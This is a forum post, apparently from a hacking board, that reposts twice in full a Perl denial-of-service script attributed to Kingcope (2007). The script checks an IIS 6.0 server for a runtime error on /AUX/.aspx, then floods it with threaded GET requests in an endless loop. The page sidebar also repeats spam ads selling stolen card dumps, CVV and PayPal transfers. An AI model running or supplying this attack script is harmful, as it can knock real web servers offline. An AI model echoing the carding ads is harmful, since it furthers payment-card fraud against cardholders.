Log in
Latest topics
Top posting users this week
No user |
Nimbuzz id Maker
Internet Information Server 6.0 Denial Of Service
Page 1 of 1
Internet Information Server 6.0 Denial Of Service
nternet Information Server 6.0 Denial Of Service
#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope@gmx.net
###########################################################
###********************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
###########################################################
use IO::Socket;
use threads;
if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];
$|=1;
sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; }
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)', Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
$k=0;
while (<$sock>) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
$k=1;
last;
}
}
if ($k==0) {
print "Server does not seem vulnerable to this attack.\n";
exit;
}
print "ATTACK!\n";
while(1){
for (my $i=0;$i<=100;$i++) {
$thr = threads->new(\&sendit);
print "\r\r\r$i/100 ";
}
foreach $thr (threads->list) {
$thr->join;
}
}
# milw0rm.com [2007-05-21]
#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope@gmx.net
###########################################################
###********************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
###########################################################
use IO::Socket;
use threads;
if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];
$|=1;
sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; }
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)', Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
$k=0;
while (<$sock>) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
$k=1;
last;
}
}
if ($k==0) {
print "Server does not seem vulnerable to this attack.\n";
exit;
}
print "ATTACK!\n";
while(1){
for (my $i=0;$i<=100;$i++) {
$thr = threads->new(\&sendit);
print "\r\r\r$i/100 ";
}
foreach $thr (threads->list) {
$thr->join;
}
}
# milw0rm.com [2007-05-21]
storm- Member
- Posts : 155
Points : 458
Reputation : 1
Join date : 2012-12-05
Similar topics
» -: Denial Of Service (DoS) Attacks :-
» Internet Explorer 6 Print Without Prompt Bug
» Tips And Trick 4Shared to get people information
» Room Service v1
» How to acess internet without any browser
» Internet Explorer 6 Print Without Prompt Bug
» Tips And Trick 4Shared to get people information
» Room Service v1
» How to acess internet without any browser
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Sun Aug 24, 2014 8:48 pm by samir alam
» Mobile Server Available 24/7 Online Service Feel Free For Use
Wed Mar 12, 2014 3:44 pm by pithu-karam
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:53 pm by gooddumpcc4u
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:52 pm by gooddumpcc4u
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:52 pm by gooddumpcc4u
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:51 pm by gooddumpcc4u
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:51 pm by gooddumpcc4u
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:50 pm by gooddumpcc4u
» VENDOR OF HIGH QUALITY FIRST HAND DUMPS !!! SELL CVV FRESH-PAYPAL-TRANSFER WU
Mon Jan 27, 2014 11:50 pm by gooddumpcc4u